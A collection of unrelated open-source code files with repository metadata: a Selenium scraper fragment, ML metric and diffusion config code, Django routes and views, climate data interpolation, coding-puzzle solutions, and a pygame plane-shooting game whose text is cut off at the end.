browser.find_element_by_xpath(\"//*[@id='daumSearch']/fieldset/div/div/button[2]\")\n# 크롬 개발자모드에서 우클릭 - copy - copy xpath 로 xpath값 가져오기\n# xpath값 안에 \"\"가 들어있을 경우 기존\"\"와 겹치므로 ''로 바꿔주기\nelem.click()\n\n# browser.close() 브라우저 창 하나 닫음\n# browser.quit() 브라우저 종료\n# exit() 터미널에서 파이썬 종료\n\ninput()","repo_name":"te-ing/study","sub_path":"NADOCODING/webscraping_basic/13_selenium.py","file_name":"13_selenium.py","file_ext":"py","file_size_in_byte":1616,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"18676463686","text":"\"\"\"\n Evaluation metrics for common tasks.\n\"\"\"\n\nimport mxnet as mx\nif mx.__version__ < \"2.0.0\":\n from mxnet.metric import EvalMetric\nelse:\n from mxnet.gluon.metric import EvalMetric\n\n__all__ = ['LossValue']\n\n\nclass LossValue(EvalMetric):\n \"\"\"\n Computes simple loss value fake metric.\n\n Parameters:\n ----------\n name : str\n Name of this metric instance for display.\n output_names : list of str, or None\n Name of predictions that should be used when updating with update_dict.\n By default include all predictions.\n label_names : list of str, or None\n Name of labels that should be used when updating with update_dict.\n By default include all labels.\n \"\"\"\n def __init__(self,\n name=\"loss\",\n output_names=None,\n label_names=None):\n super(LossValue, self).__init__(\n name,\n output_names=output_names,\n label_names=label_names)\n\n def update(self, labels, preds):\n \"\"\"\n Updates the internal evaluation result.\n\n Parameters:\n ----------\n labels : None\n Unused argument.\n preds : list of `NDArray`\n Loss values.\n \"\"\"\n loss = sum([ll.mean().asscalar() for ll in preds]) / len(preds)\n self.sum_metric += loss\n self.global_sum_metric += loss\n self.num_inst += 1\n self.global_num_inst += 1\n","repo_name":"osmr/imgclsmob","sub_path":"gluon/metrics/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":1444,"program_lang":"python","lang":"en","doc_type":"code","stars":2864,"dataset":"github-code","pt":"37"} +{"seq_id":"29441050134","text":"K, N = map(int, input().split())\nlans = [int(input()) for _ in range(K)]\n\ndef calc_count(length):\n cnt = 0\n for lan in lans:\n cnt += (lan // length)\n return cnt\n\nl, r = 1, max(lans)\nres = -1\nwhile l <= r:\n mid = (l + r) // 2\n if calc_count(mid) >= N:\n l = mid + 1\n res = mid\n else:\n r = mid - 1\nprint(res)\n","repo_name":"Acka1357/codingtest-java-20","sub_path":"Part1_강의자료/Ch07_이분탐색/문제별코드/1654_랜선자르기/1654.py","file_name":"1654.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"71420242666","text":"from django.contrib import admin\nfrom django.urls import path, include\nfrom . import views\n\napp_name = 'musicapp'\nurlpatterns = [\n path('station//nexttrack',views.stationnextsong,name='stationnextsong'),\n path('randomsong',views.randomsong, name='randomsong'),\n path('playlist/new',views.playlistcreate,name='createpl'),\n path('playlist/all',views.playlistindex,name='indexpl'),\n path('playlist//removesong/',views.removesong,name='removesong'),\n path('playlist/',views.playlistshow,name='showpl'),\n path('song//createtag',views.createtag,name='createtag'),\n path('song//remove/',views.removetag,name='removetag'),\n path('song//add/',views.addtag,name='addtag'),\n path('song/',views.showsong, name='showsong'),\n path('genre/all',views.genreindex,name='indexgenre'),\n path('station//likesong/',views.likesong,name='likesong'),\n path('station//dislikesong/',views.dislikesong,name='dislikesong'),\n path('station/',views.stationshow,name='showstation'),\n path('tag/all',views.tagindex,name='indextag'),\n\n]\n","repo_name":"kazarinoff/librandora","sub_path":"apps/music/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71317473068","text":"import shapefile as shp\n\n\ndef ParseShapefile(filename):\n \"\"\"\n Extract GPS points from a shapefile.\n\n Args;\n (String) filename: the address of a shapefile.\n Return:\n (list) shapePoint: a list of GPS point in the given shapefile.\n \"\"\"\n\n # Read the shapefile and get its shape records.\n ctr = shp.Reader(filename)\n ShapeRecords = ctr.iterShapeRecords()\n\n # For storing GPS data of roads.\n shapePoint = []\n\n # Extract GPS data of major roads that are the types of \n # 'trunk' and 'primary'.\n for sr in ShapeRecords:\n if sr.record[0] in ['trunk', 'primary']:\n shapePoint.append([])\n for point in sr.shape.points:\n shapePoint[-1].append((point[1], point[0]))\n\n return shapePoint\n\n\n#ParseShapefile(\"/Users/Jason/GitHub/RoadSeftey/RoadSafety/Data/shapefile/delhi_highway/delhi_highway.shp\")\n","repo_name":"jasonlingo/RoadSafety","sub_path":"Map/Shapefile.py","file_name":"Shapefile.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70126297707","text":"from scipy.ndimage import map_coordinates\nimport numpy as np\nimport xarray as xr\n# import time\nimport warnings\nwarnings.filterwarnings('ignore')\nimport datetime as dt\nimport os\n\nclass era5():\n def __init__(self, era5_dir = '/badc/ecmwf-era5/data/oper/an_sfc/%04d/%02d/%02d',\n era5t_dir = '/badc/ecmwf-era5t/data/oper/an_sfc/%04d/%02d/%02d'):\n self.era5_dir = era5_dir\n self.era5t_dir = era5t_dir\n\n\n #key is the variable name, value is the file name convention\n self.era5_vars = { 'd2m': '2d', # 2 metre dewpoint temperature\n 't2m': '2t', # 2 metre temperature\n 'skt': 'skt', # skin temperature (including see)\n 'tcwv': 'tcwv', # total column water vapour\n 'sd': 'sd', # snow depth\n 'asn': 'asn', # snow albedo\n 'siconc': 'ci', # Sea ice area fraction\n 'u10': '10u', # 10 metre U wind component\n 'v10': '10v', # 10 metre V wind component\n 'cape': 'cape', # Convective available potential energy\n 'msl': 'msl', # Mean sea level pressure\n 'sst': 'sst', # Sea surface temperature\n 'tcc': 'tcc', # Total cloud cover\n }\n\n def get_coord(self, xi, x, extrap = False):\n \"\"\"this is a method to estimate coordinates of query points\n with respect to the coordinate grid points \"\"\"\n\n tmp_dx = np.unique(np.diff(x))\n #check if the input grid is regular\n is_regular = (tmp_dx.size ==1)\n #check if the input points are in the ascending order\n is_ascending = (x[0](x.size-1)] = (x.size-1)\n\n else:\n if is_ascending:\n c = np.interp(xi, x, np.arange(x.size))\n if extrap:\n ind_extr = np.where(xix[-1])\n dx = x[-1]-x[-2]\n c_extrap = (xi[ind_extr]-x[-1])/dx\n c[ind_extr] = c_extrap\n\n\n else:\n ind_sort = np.arange(x.size)[::-1]\n c = np.interp(xi, x[::-1], ind_sort)\n if extrap:\n ind_extr = np.where(xi>x[0])\n dx = x[1]-x[0]\n c_extrap = (xi[ind_extr]-x[0])/dx\n c[ind_extr] = c_extrap\n\n ind_extr = np.where(xi=0, lon_da+360.)\n\n if interp == 'xarray':\n\n tmp_da = ds_ecmwf[era5_v].isel(longitude = [0,])\n tmp_da['longitude'] = tmp_da['longitude']+ 360\n\n da_interp = xr.combine_nested([ds_ecmwf[era5_v], tmp_da],\n concat_dim = 'longitude', **interp_kwargs)\n\n name_lon = lon_da.name\n name_lat = lat_da.name\n name_time = time_da.name\n\n if name_lon == 'longitude':\n lon_da.name = 'Lon'\n if name_lat == 'latitude':\n lat_da.name = 'Lat'\n if name_time == 'time':\n time_da.name = 'Time'\n\n da_out = da_interp.interp(longitude = lon_da,\n latitude = lat_da,\n time = time_da, )\n da_out = da_out.compute()\n\n\n da_out = da_out.reset_coords(names=\"longitude\", drop=True)\n da_out = da_out.reset_coords(names=\"latitude\", drop=True)\n da_out = da_out.reset_coords(names=\"time\", drop=True)\n\n if name_lon == 'longitude':\n da_out = da_out.rename({'Lon': 'longitude'})\n if name_lat == 'latitude':\n da_out = da_out.rename({'Lat': 'latitude'})\n if name_time == 'time':\n da_out = da_out.rename({'Time': 'time'})\n # print('%.1f' % (time.time() - now,))\n return da_out\n if interp == 'map_coordinates':\n\n da_dims = ds_ecmwf[era5_v].dims\n coords_dict = {'longitude': self.get_coord(\n xi = lon_da.data, x = ds_ecmwf.longitude.data, extrap = False),\n 'latitude': self.get_coord(\n xi = lat_da.data, x = ds_ecmwf.latitude.data, extrap = False),\n 'time': self.get_coord(\n xi = time_da.data, x = ds_ecmwf.time.data, extrap = False),}\n\n X = np.array([coords_dict[k] for k in da_dims])\n\n interp_val = map_coordinates(ds_ecmwf[era5_v].data,\n coordinates = X, mode = 'grid-wrap',)\n\n da_out = xr.DataArray(data = interp_val, dims = lon_da.dims,\n coords = {lon_da.name: lon_da, lat_da.name: lat_da, time_da.name: time_da})\n # print('%.1f' % (time.time() - now,))\n return da_out\n\n\n","repo_name":"mrozkamil/gpym","sub_path":"gpym/era5.py","file_name":"era5.py","file_ext":"py","file_size_in_byte":7030,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"34995693013","text":"from rest_framework import status\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom pathlib import Path\nfrom rest_framework.decorators import parser_classes\nfrom rest_framework.parsers import MultiPartParser, FormParser\n\n# import the factory model now.\nfrom base.models import Factory\n#importing the serializer as well\nfrom .serializers import FactorySerializer, ProductSerializer\n\n#importing the product model.\nfrom base.models import Product\n\nfrom base.azure_file_controller import ALLOWED_EXTENTIONS, download_blob, upload_file_to_blob, delete_blob_client\n\n@api_view(['GET'])\ndef getRoutes(request):\n routes = ['GET endpoint at /api that is home!',\n 'GET endpoint at /api/factories to get the factories',\n 'GET endpoint at /api/factories/:id to get details of a particular factory']\n return Response(routes)\n\n@api_view(['GET', 'POST'])\ndef getFactories(request):\n if request.method == 'GET':\n factories = Factory.objects.all()\n serializer = FactorySerializer(factories, many = True) #this will be query set, therefore to display as JSON, use serializer. many=True just serializes all the objects\n return Response(serializer.data) \n elif request.method == 'POST':\n serializer = FactorySerializer(data = request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status = status.HTTP_201_CREATED)\n return Response(serializer.errors, status = status.HTTP_400_BAD_REQUEST)\n\n@api_view(['GET', 'POST'])\n@parser_classes([MultiPartParser, FormParser])\ndef getAFactory(request, factoryId, format = None):\n if request.method == 'GET':\n try:\n products = Product.objects.filter(factory = factoryId)\n except Product.DoesNotExist:\n return Response(status = status.HTTP_404_NOT_FOUND)\n\n serializer = ProductSerializer(products, many = True)\n return Response(serializer.data)\n elif request.method == 'POST':\n file = request.data['image']\n print(file.name)\n \n \n\n serializer = ProductSerializer(data = request.data)\n print(serializer.is_valid())\n if serializer.is_valid():\n new_file = upload_file_to_blob(file)\n print(new_file)\n \n request.data['image'].name = new_file\n serializer.save()\n return Response(serializer.data, status = status.HTTP_201_CREATED)\n return Response(serializer.errors, status = status.HTTP_400_BAD_REQUEST)\n\n@api_view(['GET', 'PUT', 'DELETE'])\n@parser_classes([MultiPartParser, FormParser])\ndef getAProduct(request, factoryId, productId, format = None):\n try:\n product = Product.objects.filter(factory = factoryId).get(id = productId)\n except Product.DoesNotExist:\n return Response(status = status.HTTP_404_NOT_FOUND)\n \n if request.method == 'GET':\n serializer = ProductSerializer(product, many = False)\n return Response(serializer.data)\n elif request.method == 'PUT':\n serializer = ProductSerializer(product, data = request.data)\n if serializer.is_valid():\n file = request.FILES['image']\n # print(type(file))\n # ext = Path(file.name).suffix\n # # print(data['id'])\n # # print()\n\n new_file = upload_file_to_blob(file)\n # print(new_file)\n product.image.name = new_file\n request.data['image'].name = new_file\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors, status = status.HTTP_400_BAD_REQUEST)\n elif request.method == 'DELETE':\n serializer = ProductSerializer(product, many=False)\n delete_blob_client(str(product.image.name))\n product.delete()\n return Response(serializer.data, status = status.HTTP_204_NO_CONTENT)\n \n\n\n","repo_name":"prateekgandhi718/CP-complete-backend","sub_path":"base/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39361705741","text":"from functools import partial\nimport json\nimport math\nimport warnings\n\nfrom jsonmerge import merge\n\nfrom . import augmentation, layers, models, utils\n\n\ndef load_config(file):\n defaults = {\n 'model': {\n 'sigma_data': 1.,\n 'patch_size': 1,\n 'dropout_rate': 0.,\n 'augment_wrapper': True,\n 'augment_prob': 0.,\n 'mapping_cond_dim': 0,\n 'unet_cond_dim': 0,\n 'cross_cond_dim': 0,\n 'cross_attn_depths': None,\n 'skip_stages': 0,\n 'has_variance': False,\n },\n 'dataset': {\n 'type': 'imagefolder',\n },\n 'optimizer': {\n 'type': 'adamw',\n 'lr': 1e-4,\n 'betas': [0.95, 0.999],\n 'eps': 1e-6,\n 'weight_decay': 1e-3,\n },\n 'lr_sched': {\n 'type': 'inverse',\n 'inv_gamma': 20000.,\n 'power': 1.,\n 'warmup': 0.99,\n },\n 'ema_sched': {\n 'type': 'inverse',\n 'power': 0.6667,\n 'max_value': 0.9999\n },\n }\n config = json.load(file)\n return merge(defaults, config)\n\n\ndef make_model(config):\n config = config['model']\n assert config['type'] == 'image_v1'\n model = models.ImageDenoiserModelV1(\n config['input_channels'],\n config['mapping_out'],\n config['depths'],\n config['channels'],\n config['self_attn_depths'],\n config['cross_attn_depths'],\n patch_size=config['patch_size'],\n dropout_rate=config['dropout_rate'],\n mapping_cond_dim=config['mapping_cond_dim'] + (9 if config['augment_wrapper'] else 0),\n unet_cond_dim=config['unet_cond_dim'],\n cross_cond_dim=config['cross_cond_dim'],\n skip_stages=config['skip_stages'],\n has_variance=config['has_variance'],\n )\n if config['augment_wrapper']:\n model = augmentation.KarrasAugmentWrapper(model)\n return model\n\n\ndef make_denoiser_wrapper(config):\n config = config['model']\n sigma_data = config.get('sigma_data', 1.)\n has_variance = config.get('has_variance', False)\n if not has_variance:\n return partial(layers.Denoiser, sigma_data=sigma_data)\n return partial(layers.DenoiserWithVariance, sigma_data=sigma_data)\n\n\ndef make_sample_density(config):\n sd_config = config['sigma_sample_density']\n sigma_data = config['sigma_data']\n if sd_config['type'] == 'lognormal':\n loc = sd_config['mean'] if 'mean' in sd_config else sd_config['loc']\n scale = sd_config['std'] if 'std' in sd_config else sd_config['scale']\n return partial(utils.rand_log_normal, loc=loc, scale=scale)\n if sd_config['type'] == 'loglogistic':\n loc = sd_config['loc'] if 'loc' in sd_config else math.log(sigma_data)\n scale = sd_config['scale'] if 'scale' in sd_config else 0.5\n min_value = sd_config['min_value'] if 'min_value' in sd_config else 0.\n max_value = sd_config['max_value'] if 'max_value' in sd_config else float('inf')\n return partial(utils.rand_log_logistic, loc=loc, scale=scale, min_value=min_value, max_value=max_value)\n if sd_config['type'] == 'loguniform':\n min_value = sd_config['min_value'] if 'min_value' in sd_config else config['sigma_min']\n max_value = sd_config['max_value'] if 'max_value' in sd_config else config['sigma_max']\n return partial(utils.rand_log_uniform, min_value=min_value, max_value=max_value)\n if sd_config['type'] == 'v-diffusion':\n min_value = sd_config['min_value'] if 'min_value' in sd_config else 0.\n max_value = sd_config['max_value'] if 'max_value' in sd_config else float('inf')\n return partial(utils.rand_v_diffusion, sigma_data=sigma_data, min_value=min_value, max_value=max_value)\n if sd_config['type'] == 'split-lognormal':\n loc = sd_config['mean'] if 'mean' in sd_config else sd_config['loc']\n scale_1 = sd_config['std_1'] if 'std_1' in sd_config else sd_config['scale_1']\n scale_2 = sd_config['std_2'] if 'std_2' in sd_config else sd_config['scale_2']\n return partial(utils.rand_split_log_normal, loc=loc, scale_1=scale_1, scale_2=scale_2)\n raise ValueError('Unknown sample density type')\n","repo_name":"deforum-art/deforum-stable-diffusion","sub_path":"src/k_diffusion/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":4258,"program_lang":"python","lang":"en","doc_type":"code","stars":1974,"dataset":"github-code","pt":"37"} +{"seq_id":"33233952896","text":"from rest_framework import serializers\nfrom rest_framework.fields import MultipleChoiceField, empty, html\n\n\nclass DuplicateMultipleChoiceField(MultipleChoiceField):\n\n def to_internal_value(self, data):\n if isinstance(data, str) or not hasattr(data, '__iter__'):\n self.fail('not_a_list', input_type=type(data).__name__)\n if not self.allow_empty and len(data) == 0:\n self.fail('empty')\n\n return [\n super(MultipleChoiceField, self).to_internal_value(item)\n for item in data\n ]\n\n\nclass DepositWalletSerializer(serializers.Serializer):\n COIN_CHOICES = (\n (100, '100 cents'),\n (50, '50 cents'),\n (20, '20 cents'),\n (10, '10 cents'),\n (5, '5 cents')\n ) # choices must be ordered\n coins = DuplicateMultipleChoiceField(required=True, choices=COIN_CHOICES, allow_empty=False)\n\n","repo_name":"pedroserrudo/vending-mvp","sub_path":"vending/apps/wallet/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29781007023","text":"\"\"\"\nFind all possible combinations of k numbers that add up to \na number n, given that only numbers from 1 to 9 can be used \nand each combination should be a unique set of numbers.\n\nNote:\n\nAll numbers will be positive integers.\nThe solution set must not contain duplicate combinations.\nExample 1:\n\nInput: k = 3, n = 7\nOutput: [[1,2,4]]\n\"\"\"\n\nclass Solution:\n def combinationSum3(self, k: int, n: int) -> List[List[int]]:\n ans = []\n\n def helper(k, n, pre, start):\n if k == 1 and 10 > n >= start:\n ans.append(pre+[n])\n for i in range(start, 10):\n if n - i < start:\n break\n helper(k-1, n-i, pre+[i], i+1)\n\n helper(k, n, [], 1)\n\n return ans\n","repo_name":"EpsilonHF/Leetcode","sub_path":"Python/216.py","file_name":"216.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26363243601","text":"from random import randint\n\nimport pygame\nfrom constants import *\nfrom output import *\n\n\nclass DemoClass:\n \"\"\"规范样例\n\n 模块命名采用小写+下划线‘_’\n 类命名采用驼峰命名法\n 一个模块中包含若干相似类,不必一个类分出一个模块来\n\n 书山有路勤为径\n 学海无涯苦作舟\n \"\"\"\n\n def demo(self):\n \"\"\"函数样例\n 和Java不同的是,这里的函数说明写在函数体里面\n :return: 一条hello字符串\n \"\"\"\n statement_hello = \"Hello world.\\nHello Demo.\"\n # print(statement_hello)\n return statement_hello\n\n def demo_add(self, a, b):\n return a + b\n\n\nclass KeyInput:\n \"\"\"\n 控制台输出键盘状态\n ==> 输出转到窗体\n \"\"\"\n\n def __init__(self) -> None:\n super().__init__()\n self.__lunch__()\n\n def __lunch__(self):\n # 初始化\n pygame.init()\n screen = pygame.display.set_mode([Window.SCREEN_WIDTH, Window.SCREEN_HEIGHT])\n pygame.display.set_caption(Window.CAPTION)\n status = {}\n while True:\n pygame.time.Clock().tick(256)\n for event in pygame.event.get():\n info = []\n if event.type == QUIT: # 退出\n quit()\n exit()\n elif event.type == pygame.KEYDOWN or event.type == pygame.KEYUP:\n if event.key == 27: # 退出\n quit()\n exit()\n info.append('按下' if event.type == pygame.KEYDOWN else '松开')\n temp_state = 1 if event.type == pygame.KEYDOWN else 0\n if event.mod == pygame.KMOD_NONE:\n info.append('普通按键')\n if event.key in Symbol.KEYS:\n c = chr(event.key)\n info.append(c)\n status.update({c: temp_state})\n else:\n if event.mod & pygame.KMOD_LSHIFT:\n info.append('左上档键')\n if event.mod & pygame.KMOD_RSHIFT:\n info.append('右上档键')\n if event.mod & pygame.KMOD_SHIFT:\n info.append('上档键')\n info.append(event)\n info.append(status)\n show_visiable_key_info(screen, info)\n continue\n elif event.type == MOUSEMOTION:\n continue\n else:\n info.append(time.get_ticks())\n info.append(event)\n info.append(status)\n print_key_info(info)\n pygame.display.update()\n\n\nclass DishesFishOnTable:\n \"\"\"\n 饭桌上的碗筷背景 + ??鱼光标\n \"\"\"\n\n def __init__(self) -> None:\n super().__init__()\n self.__lunch__()\n\n def __lunch__(self):\n # 初始化\n pygame.init()\n screen = pygame.display.set_mode((WindowGame.SCREEN_WIDTH, WindowGame.SCREEN_HEIGHT))\n pygame.display.set_caption(WindowGame.CAPTION)\n # 载入图片\n background = pygame.image.load('resources/back.jpg').convert()\n cursor = pygame.image.load('resources/cur.png').convert_alpha()\n while True:\n # 绘制背景\n screen.blit(background, (0, 0))\n # 鼠标位置\n x, y = pygame.mouse.get_pos()\n # 计算左上角位置\n x -= cursor.get_width() / 2\n y -= cursor.get_height() / 2\n # 绘制光标\n screen.blit(cursor, (x, y))\n # 更新屏幕\n pygame.display.update()\n for event in pygame.event.get():\n if event.type == QUIT: # 退出\n quit()\n exit()\n elif event.type == pygame.KEYDOWN or event.type == pygame.KEYUP:\n if event.key == 27: # 退出\n quit()\n exit()\n\n\nclass PlaneWar:\n \"\"\"\n 飞机大战\n \"\"\"\n # 最高分\n score_history = 0\n # 玩家当前获得分数\n score = 0\n # 暂停游戏标识,初始化2代表打开游戏(需要加载游戏画面),1代表暂停,0代表正常进行\n pause = 2\n\n class Enemy(pygame.sprite.Sprite):\n \"\"\"\n 敌人类\n \"\"\"\n\n def __init__(self, surface, position):\n super().__init__()\n self.image = surface\n self.rect = self.image.get_rect()\n self.rect.left = position[0]\n self.rect.top = position[1]\n self.speed = 6\n self.countdown = 0\n self.offset = 0\n\n def update(self):\n if PlaneWar.score < 0:\n PlaneWar.score = 0\n level = PlaneWar.score >> 3 # 作战等级\n self.rect.top += self.speed * ((level * 0.3) + 1)\n if self.rect.top > WindowGame.SCREEN_HEIGHT:\n self.kill()\n PlaneWar.score -= 1 # 错过敌机,扣除一个分数\n self.offset += level * level * self.speed * (\n randint(0, WindowGame.SCREEN_WIDTH) - (WindowGame.SCREEN_WIDTH >> 1)) # 左右移动敌机\n self.offset = int(self.offset) >> 1\n self.offset //= WindowGame.SCREEN_WIDTH\n if self.offset > (self.speed * ((level * 0.3) + 1)):\n self.offset = (self.speed * ((level * 0.3) + 1))\n elif self.offset < -(self.speed * ((level * 0.3) + 1)):\n self.offset = -(self.speed * ((level * 0.3) + 1))\n self.rect.left += self.offset\n if self.offset == -1:\n self.offset = 0\n if self.rect.left < 0: # 边界检查\n self.rect.left = 0 - self.rect.left\n elif self.rect.left > WindowGame.SCREEN_WIDTH - self.image.get_width():\n self.rect.left = WindowGame.SCREEN_WIDTH - self.image.get_width()\n\n class Bullet(pygame.sprite.Sprite):\n \"\"\"\n 子弹类\n \"\"\"\n\n def __init__(self, surface, position):\n super().__init__()\n self.image = surface\n self.rect = self.image.get_rect()\n self.rect.left = position[0] - self.rect.width / 2 + 2\n self.rect.top = position[1] - self.rect.height\n self.speed = 1\n self.directions = Symbol.DIRECTIONS\n self.offset = {\n self.directions[0]: 0,\n self.directions[1]: 0,\n self.directions[2]: 0,\n self.directions[3]: 0\n }\n\n def update(self):\n self.rect.top += (self.offset[K_DOWN] - self.offset[K_UP]) * \\\n self.speed * ((PlaneWar.score >> 3) * 0.3 + 1)\n if self.rect.top < -self.rect.height:\n self.kill()\n elif self.rect.top > WindowGame.SCREEN_HEIGHT:\n self.kill()\n self.rect.left += (self.offset[K_RIGHT] - self.offset[K_LEFT]) * \\\n self.speed * ((PlaneWar.score >> 3) * 0.3 + 1)\n if self.rect.left < -self.rect.width:\n self.kill()\n elif self.rect.left > WindowGame.SCREEN_WIDTH:\n self.kill()\n\n class Player(pygame.sprite.Sprite):\n \"\"\"\n 玩家飞机类\n \"\"\"\n\n def __init__(self, surface, position):\n \"\"\"\n 初始化\n :param surface: 飞机图片\n :param position: 飞机初始位置\n \"\"\"\n super().__init__()\n self.image = surface\n self.rect = self.image[0].get_rect()\n self.rect.left = position[0]\n self.rect.top = position[1]\n self.speed = 3\n self.directions = Symbol.DIRECTIONS\n self.offset = {\n self.directions[0]: 0,\n self.directions[1]: 0,\n self.directions[2]: 0,\n self.directions[3]: 0\n }\n self.bullet = pygame.sprite.Group()\n self.is_hit = False\n\n def move(self):\n \"\"\"\n 移动飞机\n :return:\n \"\"\"\n if self.is_hit: # 被击中,失去移动能力\n return\n # 高度平移\n self.rect.top += (self.offset[K_DOWN] - self.offset[K_UP]) * \\\n self.speed * ((PlaneWar.score >> 3) * 0.4 + 1)\n if self.rect.top < 200:\n self.rect.top = 200\n elif self.rect.top > WindowGame.SCREEN_HEIGHT - self.rect.height:\n self.rect.top = WindowGame.SCREEN_HEIGHT - self.rect.height\n # 左右平移\n self.rect.left += (self.offset[K_RIGHT] - self.offset[K_LEFT]) * \\\n self.speed * ((PlaneWar.score >> 3) * 0.4 + 1)\n if self.rect.left < 0:\n self.rect.left = 0\n elif self.rect.left > WindowGame.SCREEN_WIDTH - self.rect.width:\n self.rect.left = WindowGame.SCREEN_WIDTH - self.rect.width\n\n def single_shoot(self, bullet_img):\n if self.is_hit: # 被击中,失去射击能力\n return\n bullet = PlaneWar.Bullet(bullet_img, self.rect.midtop)\n bullet.offset[K_UP] = 9 # 射击速度\n self.bullet.add(bullet)\n\n def check_whitespace_quit(self, event):\n \"\"\"\n 检测暂停或退出事件\n :param event: pygame.event事件\n :return: 0,正常进行;1,暂停\n \"\"\"\n if event.type == QUIT: # 退出\n quit()\n exit()\n elif event.type == KEYDOWN:\n key_down = event.key\n if key_down == K_ESCAPE: # 退出\n quit()\n exit()\n elif key_down == K_SPACE:\n self.pause ^= 1\n return self.pause\n\n def start(self):\n \"\"\"\n 逻辑主入口\n :return:\n \"\"\"\n # 初始化\n pygame.init()\n screen = pygame.display.set_mode((WindowGame.SCREEN_WIDTH, WindowGame.SCREEN_HEIGHT))\n pygame.display.set_caption(WindowGame.CAPTION)\n # 载入图片\n background = pygame.image.load('resources/background.png')\n gameover = pygame.image.load('resources/gameover.png')\n shoot_img = pygame.image.load('resources/shoot.png')\n # 剪切图片\n plane_imgs = [\n shoot_img.subsurface(pygame.Rect(0, 99, 102, 126)),\n shoot_img.subsurface(pygame.Rect(165, 360, 102, 126)),\n shoot_img.subsurface(pygame.Rect(165, 234, 102, 126)),\n shoot_img.subsurface(pygame.Rect(330, 624, 102, 126)),\n shoot_img.subsurface(pygame.Rect(330, 498, 102, 126)),\n shoot_img.subsurface(pygame.Rect(432, 624, 102, 126)),\n ]\n # 子弹图片\n bullet_img = shoot_img.subsurface(pygame.Rect(1004, 987, 9, 21))\n # 敌机图片\n enemy_img = shoot_img.subsurface(pygame.Rect(534, 612, 57, 43))\n enemy_destory_img = [\n shoot_img.subsurface(pygame.Rect(267, 347, 57, 43)),\n shoot_img.subsurface(pygame.Rect(873, 697, 57, 43)),\n shoot_img.subsurface(pygame.Rect(267, 296, 57, 43)),\n shoot_img.subsurface(pygame.Rect(930, 697, 57, 43))\n ]\n hero_pos = [185, 500]\n directions = Symbol.DIRECTIONS\n while True: # 新一局游戏\n player = PlaneWar.Player(plane_imgs, hero_pos)\n enemy = pygame.sprite.Group()\n enemy_destroy = pygame.sprite.Group()\n player_countdown = 1\n PlaneWar.score = 0\n temp_score = -1\n while True:\n pygame.time.Clock().tick(128)\n for event in pygame.event.get(): # 监听键盘和窗口退出事件\n self.check_whitespace_quit(event)\n if event.type == KEYDOWN:\n key_down = event.key\n if key_down in directions:\n player.offset[key_down] = 1\n elif event.type == KEYUP:\n key_up = event.key\n if key_up in directions:\n player.offset[key_up] = 0\n if self.pause == 1:\n continue\n player.move()\n # 绘制背景\n screen.blit(background, (0, 0))\n # 绘制飞机\n if player.is_hit: # 飞机被击中\n if time.get_ticks() % 24 == 0: # 开始爆炸动画\n player_countdown += 1\n if player_countdown > 5: # 爆炸画面播放完成,本轮游戏结束\n self.pause = 1\n break\n screen.blit(player.image[player_countdown], player.rect)\n else:\n screen.blit(player.image[0 if pygame.time.get_ticks() % 512 > 256 else 1], player.rect)\n # 绘制子弹\n if time.get_ticks() % 6 == 0:\n player.single_shoot(bullet_img)\n player.bullet.draw(screen)\n # 绘制敌机\n if time.get_ticks() % 32 == 0:\n enemy.add(PlaneWar.Enemy(enemy_img, (randint(0, WindowGame.SCREEN_WIDTH - enemy_img.get_width()),\n -enemy_img.get_height())))\n enemy.update()\n enemy.draw(screen)\n # 子弹与敌机碰撞\n enemy_destroy.add(pygame.sprite.groupcollide(enemy, player.bullet, True, True))\n # 飞机坠落切换动画\n for e_dest in enemy_destroy:\n screen.blit(enemy_destory_img[e_dest.countdown], e_dest.rect)\n if time.get_ticks() % 14 == 0:\n if e_dest.countdown < 3:\n e_dest.countdown += 1\n else:\n e_dest.kill()\n enemy_destroy.remove(e_dest)\n PlaneWar.score += 1 # 击毁敌机,分数+1\n # 战机被撞\n player_destroys = pygame.sprite.spritecollide(player, enemy, True)\n if len(player_destroys) > 0:\n enemy_destroy.add(player_destroys)\n player.is_hit = True\n # 玩家最终得分为:战机击毁前得分+战机撞击敌机数目\n temp_score = PlaneWar.score + len(player_destroys)\n # 显示分数\n if temp_score != -1:\n PlaneWar.score = temp_score\n if PlaneWar.score < 0:\n PlaneWar.score = 0\n screen.blit(\n pygame.font.SysFont(Symbol.Font.SimHei, 30).render(\"当前得分:\" + str(PlaneWar.score), 3, (255, 0, 0)),\n (30, 20))\n # 更新屏幕\n player.bullet.update()\n pygame.display.update()\n if self.pause == 2: # 打开游戏,加载一帧画面后静止\n self.pause = 1\n # 游戏结束画面\n PlaneWar.score = temp_score\n if PlaneWar.score < 0:\n PlaneWar.score = 0\n screen.blit(gameover, (0, 0))\n screen.blit(pygame.font.SysFont(Symbol.Font.SimHei, 30)\n .render(\"历史最高分:\" + str(PlaneWar.score_history), 3, (50, 50, 50)), (30, 30))\n screen.blit(pygame.font.SysFont(Symbol.Font.SimHei, 30)\n .render(\"本次得分:\" + str(PlaneWar.score), 3, (255, 255, 255)), (60, 70))\n if PlaneWar.score > PlaneWar.score_history:\n PlaneWar.score_history = PlaneWar.score\n screen.blit(pygame.font.SysFont(Symbol.Font.SimHei, 